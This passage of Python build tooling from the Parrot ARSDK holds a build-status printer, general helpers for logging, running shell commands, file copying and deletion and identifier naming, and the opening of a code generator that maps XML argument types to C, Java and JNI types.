termSizeArr = termSizeStr.split(' ')
try:
termCols = int(termSizeArr[1]) - 1
except:
termCols = 80
else:
termCols = 80
class logcolors:
FAIL = '\033[31m' if hasColors else 'FA:'
PASS = '\033[32m' if hasColors else 'OK:'
REQ = '\033[33m' if hasColors else 'ND:'
NONE = '\033[34m' if hasColors else 'NR:'
UNAI = '\033[30m' if hasColors else 'NA:'
DEF = '\033[39m' if hasColors else ''
def SDKPrintStatus(msg, available, requested, tried, built, padToLen=20, newline=False, currentCol=0, baseCol=0):
colorLen = 3 if not hasColors else 0
padLen = padToLen - len(msg)
while padLen <= 0:
padLen += padToLen
printLen = len(msg) + padLen + colorLen
futureCol = currentCol + printLen
if futureCol > termCols:
newline = True
if newline:
ARPrint('')
ARPrint(' '*baseCol, True)
futureCol = printLen + baseCol
if not available:
ARPrint(logcolors.UNAI, True)
elif not requested and not tried:
ARPrint(logcolors.NONE, True)
elif not tried:
ARPrint(logcolors.REQ, True)
elif not built:
ARPrint(logcolors.FAIL, True)
else:
ARPrint(logcolors.PASS, True)
ARPrint(msg, True)
if padLen > 0:
ARPrint(' '*padLen, True)
ARPrint(logcolors.DEF, True)
return futureCol
ARPrint('')
ARPrint('Status :')
ARPrint(' --> Legend : ' + logcolors.FAIL + 'FAIL ' + logcolors.PASS + 'PASS ' + logcolors.REQ + 'NOT_BUILT ' + logcolors.NONE + 'NOT_REQUESTED ' + logcolors.UNAI + 'NOT_AVAILABLE ' + logcolors.DEF)
ARPrint(' --> Binaries are postfixed with `*`')
ARPrint(' --> Postbuild scripts are postfixed with `+`')
ARPrint('')
offset = 13 if hasColors else 16
for t in targets.list:
targetRequested = t in parser.activeTargets
targetTried = bool(t.triedToBuildLibraries)
targetBuilt = len(t.alreadyBuiltLibraries) == len(t.triedToBuildLibraries) and not t.failed
SDKPrintStatus(t.name, True, targetRequested, targetTried, targetBuilt, padToLen=10)
ARPrint(' : ', True)
count=offset
first=False
for l in libraries.list:
libAvailable = l.isAvailableForTarget(t)
libRequested = l in parser.activeLibs and targetRequested
libTried = t.hasTriedToBuild(l)
libBuilt = t.hasAlreadyBuilt(l)
count = SDKPrintStatus(l.name, libAvailable, libRequested, libTried, libBuilt, padToLen=20, newline=first, currentCol=count, baseCol=offset)
first=False
first=True
for b in binaries.list:
binAvailable = b.isAvailableForTarget(t)
binRequested = b in parser.activeBins and targetRequested
binTried = t.hasTriedToBuildBinary(b)
binBuilt = t.hasAlreadyBuiltBinary(b)
count = SDKPrintStatus(b.name + '*', binAvailable, binRequested, binTried, binBuilt, padToLen=20, newline=first, currentCol=count, baseCol=offset)
first=False
first=True
for scrinfo in t.postbuildScripts:
scrAvailable = True
scrRequested = targetRequested
scrTried = scrinfo['done'] is not None
scrBuilt = bool(scrinfo['done'])
count = SDKPrintStatus(scrinfo['name'] + '+', scrAvailable, scrRequested, scrTried, scrBuilt, padToLen=20, newline=first, currentCol=count, baseCol=offset)
first=False
ARPrint('')
ARPrint('')
ARLog('End of build')
if not allOk:
ARLog('-- Errors were found during build ! --')
end = time.time()
seconds = int(end - start)
hours, tmp = divmod(seconds, 3600)
minutes, seconds = divmod(tmp, 60)
strh=''
strm=''
strs = str(seconds) + 's'
if hours > 0:
strh = str(hours) + 'h '
strm = str(minutes) + 'm '
if minutes > 0:
strm = str(minutes) + 'm '
ARLog('Build took %(strh)s%(strm)s%(strs)s' % locals())
sys.exit (0 if allOk else 1)
```
#### File: Utils/Python/ARFuncs.py
```python
import sys
import subprocess
import os
import inspect
import shutil
import re
import filecmp
import errno
# Print a message
def ARPrint(msg, noNewLine=False):
sys.stdout.write(msg)
if not noNewLine:
sys.stdout.write('\n')
# Exit the script with the given error code (prints '-- ABORTING --' when non-zero)
def EXIT(code):
if code != 0:
ARPrint('-- ABORTING --')
sys.exit(code)
# Class to handle 'cd' and 'cd -'
class Chdir:
def __init__(self, newPath, create=True, verbose=True):
self.savedPath = os.getcwd()
if not os.path.exists(newPath) and create:
os.makedirs(newPath)
os.chdir(newPath)
self.verbose = verbose
if verbose:
try:
ARLog('Entering <%(newPath)s>' % locals())
except:
pass
def exit(self):
os.chdir(self.savedPath)
if self.verbose:
try:
ARLog('Returning to <'+self.savedPath+'>')
except:
pass
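# Minimal usage sketch (hypothetical path): enter a directory, run commands, then go back:
#   prevDir = Chdir('Targets/Build')   # creates the directory if needed, then chdir()s into it
#   ...                                # work performed from inside Targets/Build
#   prevDir.exit()                     # returns to the directory we started from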
# Execute a bash command
def ARExecute(cmdline, isShell=True, failOnError=False, printErrorMessage=True):
try:
if printErrorMessage:
ARLog('Running <%(cmdline)s>' % locals())
subprocess.check_call(cmdline, shell=isShell)
return True
except subprocess.CalledProcessError as e:
if printErrorMessage:
ARPrint('Error while running <%(cmdline)s>' % locals())
if failOnError:
EXIT(e.returncode)
else:
return False
# Execute a bash command, and return the stdout output
def ARExecuteGetStdout(args, isShell=False, failOnError=True, printErrorMessage=True):
if printErrorMessage:
ARLog('Running <' + ARListAsBashArg(args) + '>')
p = subprocess.Popen(args, shell=isShell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
out, err = p.communicate()
ret = p.wait()
if ret:
if printErrorMessage:
ARLog('Error while running <' + ARListAsBashArg(args) + '>')
if failOnError:
EXIT(ret)
return ''
return out.strip()
# Checks if a given command exists in path
def ARExistsInPath(program, isShell=True):
try:
subprocess.check_call('which %(program)s 2>/dev/null 1>/dev/null' % locals(), shell=isShell)
return True
except subprocess.CalledProcessError as e:
return False
# Set an environment variable
def ARSetEnv(var, val):
os.environ[var] = val
# Set an environment variable if not currently defined
# return True if the variable was added
def ARSetEnvIfEmpty(var, val):
if os.environ.get(var) is None:
os.environ[var] = val
return True
return False
# Unset an environment variable
def ARUnsetEnv(var):
if var in os.environ:
os.environ.pop(var)
# Set an environment variable to 'ideal' if it exists in path, else to 'fallback'
def ARSetEnvIfExists(var, ideal, fallback, args=''):
if ARExistsInPath(ideal):
ARSetEnv(var, ideal + ' ' + args)
else:
ARSetEnv(var, fallback + ' ' + args)
# Append a message to a file
def ARAppendToFile(filename, message, doPrint=True):
arfile = open(filename, 'a')
arfile.write(message + '\n')
arfile.close()
if doPrint:
ARPrint(message)
# Log a message (append to the default logfile + output to console)
def ARLog(message):
LOGFILE = os.environ.get('ARLOGF')
if not LOGFILE:
LOGFILE = ARPathFromHere('build.log')
ARAppendToFile(LOGFILE, message)
# Init the default log file
def ARInitLogFile():
LOGFILE = ARPathFromHere('build.log')
ARSetEnv('ARLOGF', LOGFILE)
ARDeleteIfExists(LOGFILE)
# Get the absolute path from a path relative to the script's directory
def ARPathFromHere(path):
MYDIR=os.path.abspath(os.path.dirname(sys.argv[0]))
if '' == MYDIR:
MYDIR=os.getcwd()
return '%(MYDIR)s/%(path)s' % locals()
# Get the absolute path from a path relative to the current working directory
def ARPathFromPwd(path):
MYDIR=os.getcwd()
return '%(MYDIR)s/%(path)s' % locals()
# Transform a python list to a bash args list
def ARListAsBashArg(lst):
return ' '.join(lst)
# Checks if file A is newer than file B
def ARFileIsNewerThan(fileA, fileB):
if not os.path.exists(fileA):
return False
if not os.path.exists(fileB):
return True
return os.stat(fileA).st_mtime > os.stat(fileB).st_mtime
# Called at the beginning of a function to log its start with all its arguments
def StartDumpArgs(**kwargs):
CallerName = inspect.stack()[1][3]
if len(kwargs) > 0:
ARLog('Start running %(CallerName)s with args:' % locals())
else:
ARLog('Start running %(CallerName)s' % locals())
for key, value in kwargs.items():
ARLog(' -- %(key)s -> %(value)s' % locals())
# Called at the end of a function to log its return status and all its arguments
# (use 'return EndDumpArgs(res=True/False, args)')
def EndDumpArgs(res, **kwargs):
CallerName = inspect.stack()[1][3]
START_MSG = 'Finished'
if not res:
START_MSG = 'Error while'
if len(kwargs) > 0:
ARLog('%(START_MSG)s running %(CallerName)s with args:' % locals())
else:
ARLog('%(START_MSG)s running %(CallerName)s' % locals())
for key, value in kwargs.items():
ARLog(' -- %(key)s -> %(value)s' % locals())
return res
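# Typical usage sketch (hypothetical build step) for the two helpers above:
#   def BuildSomething(target, clean=False):
#       StartDumpArgs(target=target, clean=clean)
#       ok = ARExecute('make')
#       return EndDumpArgs(res=ok, target=target, clean=clean)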
# Copy and replace a file
def ARCopyAndReplaceFile(SrcFile, DstFile):
if not os.path.exists(SrcFile):
raise Exception('%(SrcFile)s does not exist' % locals())
if not os.path.exists(os.path.dirname(DstFile)):
os.makedirs(os.path.dirname(DstFile))
shutil.copy2(SrcFile, DstFile)
def ar_copytree(src, dst, symlinks=False, ignore=None):
names = os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
if not os.path.exists(dst):
os.makedirs(dst)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if symlinks and os.path.islink(srcname):
linkto = os.readlink(srcname)
os.symlink(linkto, dstname)
elif os.path.isdir(srcname):
ar_copytree(srcname, dstname, symlinks, ignore)
else:
shutil.copy2(srcname, dstname)
# XXX What about devices, sockets etc.?
except (IOError, os.error) as why:
errors.append((srcname, dstname, str(why)))
# catch the Error from the recursive copytree so that we can
# continue with other files
except shutil.Error as err:
errors.extend(err.args[0])
try:
shutil.copystat(src, dst)
except shutil.WindowsError:
# can't copy file access times on Windows
pass
except OSError as why:
errors.extend((src, dst, str(why)))
if errors:
raise shutil.Error(errors)
# Recursive copy and replace of a directory.
# Can optionally delete the previous content of the destination directory
# instead of merging
def ARCopyAndReplace(SrcRootDir, DstRootDir, deletePrevious=False, ignoreRegexpsForDeletion=[]):
if not os.path.exists(SrcRootDir):
raise Exception('%(SrcRootDir)s does not exist' % locals())
if deletePrevious:
if ignoreRegexpsForDeletion:
ARDeleteRecursivelyNonMatching(DstRootDir, regex=ignoreRegexpsForDeletion)
else:
ARDeleteIfExists(DstRootDir)
ar_copytree(SrcRootDir, DstRootDir, symlinks=True)
else:
if not os.path.exists(DstRootDir):
os.makedirs(DstRootDir)
for SrcDir, directories, files in os.walk(SrcRootDir):
DstDir = SrcDir.replace(SrcRootDir, DstRootDir)
if not os.path.exists(DstDir):
os.mkdir(DstDir)
for _file in files:
SrcFile = os.path.join(SrcDir, _file)
DstFile = os.path.join(DstDir, _file)
ARDeleteIfExists(DstFile)
shutil.copy2(SrcFile, DstFile)
# Delete one or multiple files/directories
# Do not throw an error if the file/directory does not exist
def ARDeleteIfExists(*args):
for fileOrDir in args:
if os.path.exists(fileOrDir):
if os.path.isdir(fileOrDir):
shutil.rmtree(fileOrDir)
else:
os.remove(fileOrDir)
# Delete a file if it does not match any given regex
def ARDeleteFileIfNonMatching(path, regex=[]):
if os.path.exists(path):
name = os.path.basename(path)
for exp in regex:
if re.match(exp, name):
break
else:
ARDeleteIfExists(path)
# Delete a directory's contents except for files matching any given regex in a list
# Also deletes empty directories
def ARDeleteRecursivelyNonMatching(path, regex=[]):
if not os.path.isdir(path):
ARDeleteFileIfNonMatching(path, regex=regex)
else:
for tst in os.listdir(path):
ARDeleteRecursivelyNonMatching(os.path.join(path, tst), regex=regex)
try:
os.rmdir(path)
except OSError as e:
if e.errno != errno.ENOTEMPTY:
raise e
# Gets the number of available CPUs
# If the real number cannot be determined, return 1
def ARGetNumberOfCpus():
try:
import multiprocessing
return multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
pass
return 1
def ARReplaceEnvVars(source):
envMatches = re.findall(r'%\{.*?\}%', source)
for _match in envMatches:
Match = _match.replace('%{', '').replace('}%', '')
try:
EnvMatch = os.environ[Match]
source = source.replace(_match, EnvMatch)
except (KeyError):
ARLog('Environment variable %(Match)s is not set !' % locals())
return None
return source
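# Example sketch: with HOME=/home/user in the environment, ARReplaceEnvVars('%{HOME}%/out')
# returns '/home/user/out'; if a referenced variable is unset, the error is logged and None is returned.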
def ARReplaceFileIfDifferent(oldFile, newFile):
if not os.path.exists(oldFile) or not filecmp.cmp(oldFile, newFile):
ARDeleteIfExists(oldFile)
os.rename(newFile, oldFile)
else:
ARDeleteIfExists(newFile)
def ARCapitalize (arstr):
nameParts = arstr.split('_')
name = ''
for part in nameParts:
if len(part) > 1:
name = name + part[0].upper() + part[1:]
elif len(part) == 1:
name = name + part[0].upper()
return name
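# e.g. ARCapitalize('read_write_buffer') -> 'ReadWriteBuffer' (underscores dropped, each part capitalized)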
def ARUncapitalize (arstr):
if len(arstr) > 1:
return arstr[0].lower() + arstr[1:]
elif len(arstr) == 1:
return arstr[0].lower()
else:
return ''
def ARStringIsInteger(arstr):
try:
int(arstr)
return True
except ValueError:
return False
#
# Name generation functions
#
def ARMacroName (Module, Submodule, Name):
# MODULE_SUBMODULE_NAME
return Module.upper () + '_' + Submodule.upper () + '_' + Name.upper ()
def ARFunctionName (Module, Submodule, Name):
# MODULE_Submodule_Name
return Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name)
def ARTypeName (Module, Submodule, Name):
# MODULE_Submodule[_Name]_t
if '' != Name:
return Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name) + '_t'
else:
return Module.upper () + '_' + ARCapitalize (Submodule) + '_t'
def ARGlobalName (Module, Submodule, Name):
# MODULE_Submodule_Name
return Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name)
def ARGlobalConstName (Module, Submodule, Name):
# cMODULE_Submodule_Name
return 'c' + Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name)
def AREnumValue (Module, Submodule, Enum, Name):
# MODULE_SUBMODULE_ENUM_NAME
if Enum.upper () == 'ERROR' and (Name.upper () == 'OK' or Name.upper () == 'ERROR'):
return Module.upper () + '_' + Submodule.upper () + '_' + Name.upper ()
else:
return Module.upper () + '_' + Submodule.upper () + '_' + Enum.upper () + '_' + Name.upper ()
def AREnumName (Module, Submodule, Enum):
# eMODULE_SUBMODULE_ENUM
return 'e' + Module.upper () + '_' + Submodule.upper () + '_' + Enum.upper ()
def ARFlagValue (Module, Submodule, Enum, Name):
return Module.upper () + '_FLAG_' + Submodule.upper () + '_' + Enum.upper () + '_' + Name.upper ()
def ARJavaEnumType (Module, Submodule, Enum):
# MODULE_SUBMODULE_ENUM_"ENUM"
return Module.upper () + '_' + Submodule.upper () + '_' + Enum.upper () + '_ENUM'
def ARJavaMultiSetType (Module, Submodule, multiset):
# ModuleSubmoduleName
return Module+ ARCapitalize (Submodule) + ARCapitalize (multiset)
def ARJavaEnumValDef (Module, Submodule, Enum, Name, oldFormat=False):
# MODULE_SUBMODULE_ENUM_NAME
if oldFormat:
return AREnumValue (Module, Submodule, Enum, Name)
elif Name[0].isdigit():
return Enum.upper() + '_' + Name.upper ()
else:
return Name.upper ()
def ARJavaEnumValue (Module, Submodule, Enum, Name, oldFormat=False):
# MODULE_SUBMODULE_ENUM_"ENUM".MODULE_SUBMODULE_ENUM_NAME
return ARJavaEnumType (Module, Submodule, Enum) + '.' + ARJavaEnumValDef (Module, Submodule, Enum, Name, oldFormat)
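# Worked examples (values matching those used by the libARCommands generator):
#   ARFunctionName('ARCommands', 'ReadWrite', 'Read8FromBuffer') -> 'ARCOMMANDS_ReadWrite_Read8FromBuffer'
#   AREnumName('ARCommands', 'ID', 'FEATURE')                    -> 'eARCOMMANDS_ID_FEATURE'
#   AREnumValue('ARCommands', 'ID', 'FEATURE', 'common')         -> 'ARCOMMANDS_ID_FEATURE_COMMON'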
```
#### File: libARCommands/Tools/libARCommandsgen.py
```python
import sys
import os
import re
import arsdkparser
MYDIR=os.path.abspath(os.path.dirname(__file__))
LIBARCOMMANDS_DIR=os.path.realpath(os.path.join(MYDIR, ".."))
PACKAGES_DIR=os.path.realpath(os.path.join(MYDIR, "../.."))
sys.path.append('%(MYDIR)s/../../ARSDKBuildUtils/Utils/Python' % locals())
from ARFuncs import *
from arsdkparser import *
LIB_NAME = 'libARCommands'
LIB_MODULE = LIB_NAME.replace ('lib', '')
#################################
# CONFIGURATION : #
#################################
# Setup XML and C/HFiles Names #
# Public header names must be #
# LIB_NAME + '/fileName.h' #
#################################
SDK_PACKAGE_ROOT='com.parrot.arsdk.'
JNI_PACKAGE_NAME=SDK_PACKAGE_ROOT + LIB_MODULE.lower ()
JNI_PACKAGE_DIR = JNI_PACKAGE_NAME.replace ('.', '/')
# Default project name
DEFAULTPROJECTNAME='common'
#Name of the output public header containing id enums
COMMANDSID_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Ids.h'
#Name of the output public header containing typedefs
COMMANDSTYPES_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Types.h'
#Name of the output public header containing encoder helpers
COMMANDSGEN_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Generator.h'
#Name of the output public header containing decoder helpers
COMMANDSDEC_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Decoder.h'
#Name of the output public header containing filter helpers
COMMANDSFIL_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Filter.h'
#Name of the output internal header containing reader/writer functions prototypes
COMMANDSRW_HFILE_NAME='ARCOMMANDS_ReadWrite.h'
#Name of the output C file containing reader/writer functions
COMMANDSRW_CFILE_NAME='ARCOMMANDS_ReadWrite.c'
#Name of the output C file containing encoder helpers
COMMANDSGEN_CFILE_NAME='ARCOMMANDS_Generator.c'
#Name of the output C file containing decoder helpers
COMMANDSDEC_CFILE_NAME='ARCOMMANDS_Decoder.c'
#Name of the output C file containing filter helpers
COMMANDSFIL_CFILE_NAME='ARCOMMANDS_Filter.c'
#Name of the output C/H common testbench file
TB_CFILE_NAME='autoTest.c'
TB_HFILE_NAME='autoTest.h'
#Tag for tb ARSAL_PRINT calls
TB_TAG='AutoTest'
#Name of the linux entry point file for autotest
TB_LIN_CFILE_NAME='autoTest_linux.c'
#Name of the JNI C File
JNI_CFILE_NAME='ARCOMMANDS_JNI.c'
JNI_DECODER_CFILE_NAME='ARCOMMANDS_JNIDecoder.c'
JNI_FILTER_CFILE_NAME='ARCOMMANDS_JNIFilter.c'
#Name of the JNI JAVA File
JNI_JFILE_NAME='ARCommand.java'
JNI_DECODER_JFILE_NAME='ARCommandsDecoder.java'
JNIClassName, _ = os.path.splitext (JNI_JFILE_NAME)
JNIDecoderClassName, _ = os.path.splitext (JNI_DECODER_JFILE_NAME)
JNI_FILTER_JFILE_NAME='ARCommandsFilter.java'
JNIFilterClassName, _ = os.path.splitext (JNI_FILTER_JFILE_NAME)
#Name of the JNI JAVA Interfaces files (DO NOT MODIFY)
JAVA_INTERFACES_FILES_NAME=JNIClassName + '*Listener.java'
JAVA_ENUM_FILES_NAME=JNIClassName.upper() + '*_ENUM.java'
def _get_args_without_multiset(args):
for arg in args:
if not isinstance(arg.argType, arsdkparser.ArMultiSetting):
yield arg
def _get_args_multiset(args):
for arg in args:
if isinstance(arg.argType, arsdkparser.ArMultiSetting):
yield arg
class Paths:
def __init__(self, outdir):
#Relative path of SOURCE dir
self.SRC_DIR=outdir+'/Sources/'
#Relative path of INCLUDES dir
self.INC_DIR=outdir+'/Includes/'
#Relative path of TESTBENCH dir
self.TB__DIR=outdir+'/TestBench/'
#Relative path of unix-like (Linux / os-x) TESTBENCH dir
self.LIN_TB_DIR=self.TB__DIR + 'linux/'
#Relative path of multiplatform code for testbenches
self.COM_TB_DIR=self.TB__DIR + 'common/'
#Relative path of JNI dir
self.JNI_DIR=outdir+'/JNI/'
#Relative path of JNI/C dir
self.JNIC_DIR=self.JNI_DIR + 'c/'
#Relative path of JNI/Java dir
self.JNIJ_DIR=self.JNI_DIR + 'java/'
self.JNIJ_OUT_DIR=self.JNIJ_DIR + JNI_PACKAGE_DIR + '/'
# Create array of generated files (so we can cleanup only our files)
self.GENERATED_FILES = []
self.COMMANDSID_HFILE=self.INC_DIR + COMMANDSID_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSID_HFILE)
self.COMMANDSGEN_HFILE=self.INC_DIR + COMMANDSGEN_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSGEN_HFILE)
self.COMMANDSTYPES_HFILE=self.INC_DIR + COMMANDSTYPES_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSTYPES_HFILE)
self.COMMANDSGEN_CFILE=self.SRC_DIR + COMMANDSGEN_CFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSGEN_CFILE)
self.COMMANDSDEC_HFILE=self.INC_DIR + COMMANDSDEC_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSDEC_HFILE)
self.COMMANDSDEC_CFILE=self.SRC_DIR + COMMANDSDEC_CFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSDEC_CFILE)
self.COMMANDSFIL_HFILE=self.INC_DIR + COMMANDSFIL_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSFIL_HFILE)
self.COMMANDSFIL_CFILE=self.SRC_DIR + COMMANDSFIL_CFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSFIL_CFILE)
self.COMMANDSRW_HFILE=self.SRC_DIR + COMMANDSRW_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSRW_HFILE)
self.COMMANDSRW_CFILE=self.SRC_DIR + COMMANDSRW_CFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSRW_CFILE)
self.TB_CFILE=self.COM_TB_DIR + TB_CFILE_NAME
self.GENERATED_FILES.append (self.TB_CFILE)
self.TB_HFILE=self.COM_TB_DIR + TB_HFILE_NAME
self.GENERATED_FILES.append (self.TB_HFILE)
self.TB_LIN_CFILE=self.LIN_TB_DIR + TB_LIN_CFILE_NAME
self.GENERATED_FILES.append (self.TB_LIN_CFILE)
# Create array of generated JNI files (so we can cleanup only our files)
self.GENERATED_JNI_FILES = []
self.JNI_CFILE=self.JNIC_DIR + JNI_CFILE_NAME
self.GENERATED_JNI_FILES.append (self.JNI_CFILE)
self.JNI_DECODER_CFILE=self.JNIC_DIR + JNI_DECODER_CFILE_NAME
self.GENERATED_JNI_FILES.append (self.JNI_DECODER_CFILE)
self.JNI_FILTER_CFILE=self.JNIC_DIR + JNI_FILTER_CFILE_NAME
self.GENERATED_JNI_FILES.append (self.JNI_FILTER_CFILE)
# Create array of generated JAVA files (so we can cleanup only our files)
self.GENERATED_JAVA_FILES = []
self.JNI_JFILE=self.JNIJ_OUT_DIR + JNI_JFILE_NAME
self.GENERATED_JAVA_FILES.append (self.JNI_JFILE)
self.JNI_DECODER_JFILE=self.JNIJ_OUT_DIR + JNI_DECODER_JFILE_NAME
self.GENERATED_JAVA_FILES.append (self.JNI_DECODER_JFILE)
self.JNI_FILTER_JFILE=self.JNIJ_OUT_DIR + JNI_FILTER_JFILE_NAME
self.GENERATED_JAVA_FILES.append (self.JNI_FILTER_JFILE)
self.JAVA_INTERFACES_FILES=self.JNIJ_OUT_DIR + JAVA_INTERFACES_FILES_NAME
self.JAVA_ENUM_FILES=self.JNIJ_OUT_DIR + JAVA_ENUM_FILES_NAME
##### END OF CONFIG #####
# Create names for #ifndef _XXX_ statements in .h files
COMMANDSID_DEFINE='_' + COMMANDSID_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
COMMANDSDEC_DEFINE='_' + COMMANDSDEC_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
COMMANDSGEN_DEFINE='_' + COMMANDSGEN_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
COMMANDSTYPES_DEFINE='_' + COMMANDSTYPES_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
COMMANDSRW_DEFINE='_' + COMMANDSRW_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
COMMANDSFIL_DEFINE='_' + COMMANDSFIL_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
TB_DEFINE='_' + TB_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
# Submodules names
ID_SUBMODULE='ID'
GEN_SUBMODULE='Generator'
DEC_SUBMODULE='Decoder'
FIL_SUBMODULE='Filter'
RW_SUBMODULE='ReadWrite'
TB_SUBMODULE='Testbench'
JNI_SUBMODULE='JNI'
JNI_FILTER_SUBMODULE='JNI_FILTER'
hasArgOfType = {ArArgType.U8 : True, ArArgType.I8 : False,
ArArgType.U16 : True, ArArgType.I16 : False,
ArArgType.U32 : False, ArArgType.I32 : False,
ArArgType.U64 : False, ArArgType.I64 : False,
ArArgType.FLOAT : False, ArArgType.DOUBLE : False,
ArArgType.STRING : False, ArArgType.ENUM : False,
ArArgType.BITFIELD : False, ArArgType.MULTISETTING : False}
#Type conversion from XML Defined types to many other types
# XML Defined types
XMLTYPES = [ArArgType.U8, ArArgType.I8,
ArArgType.U16, ArArgType.I16,
ArArgType.U32, ArArgType.I32,
ArArgType.U64, ArArgType.I64,
ArArgType.FLOAT, ArArgType.DOUBLE,
ArArgType.STRING]
# Equivalent C types
CTYPES = ['uint8_t', 'int8_t',
'uint16_t', 'int16_t',
'uint32_t', 'int32_t',
'uint64_t', 'int64_t',
'float', 'double',
'char *']
# Equivalent C types with const char *
CTYPES_WC = ['uint8_t', 'int8_t',
'uint16_t', 'int16_t',
'uint32_t', 'int32_t',
'uint64_t', 'int64_t',
'float', 'double',
'const char *']
# Equivalent size for the Generator internal functions
SZETYPES = ['U8', 'U8',
'U16', 'U16',
'U32', 'U32',
'U64', 'U64',
'Float', 'Double',
'String']
# Equivalent calls for the Decoder internal functions
CREADERS = [ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer'), ' (int8_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer'), ' (int16_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer'), ' (int32_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer'), ' (int64_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadFloatFromBuffer'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadDoubleFromBuffer'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadStringFromBuffer')]
# Equivalent calls for the Decoder print internal functions
CPRINTERS = [ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU8'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI8'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU16'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI16'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU32'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU64'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI64'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintFloat'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintDouble'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintString')]
# Equivalent JAVA Types
# No unsigned types in java, so use signed types everywhere
JAVATYPES = ['byte', 'byte',
'short', 'short',
'int', 'int',
'long', 'long',
'float', 'double',
'String']
# Equivalent JNI Signatures
JAVASIG = ['B', 'B',
'S', 'S',
'I', 'I',
'J', 'J',
'F', 'D',
'Ljava/lang/String;']
# Equivalent JNI types
JNITYPES = ['jbyte', 'jbyte',
'jshort', 'jshort',
'jint', 'jint',
'jlong', 'jlong',
'jfloat', 'jdouble',
'jstring']
# JNI UnsignedToSigned casts
JNIUTSCASTS = ['(jbyte)', '',
'(jshort)', '',
'(jint)', '',
'(jlong)', '',
'', '',
'']
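# The tables above are parallel arrays indexed through XMLTYPES.index(...): for example, ArArgType.FLOAT
# maps to the C type 'float', the Java type 'float', the JNI signature 'F' and the JNI type 'jfloat'.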
def xmlToC (module, ftr, cmd, arg, is_arg=False):
if isinstance(arg.argType, ArEnum):
return AREnumName (module, get_ftr_old_name(ftr), arg.argType.name)
if isinstance(arg.argType, ArMultiSetting):
ctype = ARTypeName (module, get_ftr_old_name(ftr), arg.argType.name)
if (is_arg):
return ctype + ' *'
return ctype
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return CTYPES [xmlIndex]
def xmlToCcharAreConst (module, ftr, cmd, arg, is_arg=False):
if isinstance(arg.argType, ArEnum):
return AREnumName (module, get_ftr_old_name(ftr), arg.argType.name)
if isinstance(arg.argType, ArMultiSetting):
ctype = ARTypeName (module, get_ftr_old_name(ftr), arg.argType.name)
if (is_arg):
return ctype + ' *'
return ctype
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return CTYPES_WC [xmlIndex]
def xmlToCwithConst (module, ftr, cmd, arg, is_arg=False):
if isinstance(arg.argType, ArEnum):
return AREnumName (module, get_ftr_old_name(ftr), arg.argType.name)
if isinstance(arg.argType, ArMultiSetting):
ctype = 'const ' + ARTypeName (module, get_ftr_old_name(ftr), arg.argType.name)
if is_arg:
return ctype + ' *'
return ctype
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return CTYPES_WC [xmlIndex]
def xmlToSize (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return 'U32'
if isinstance(arg.argType, ArBitfield):
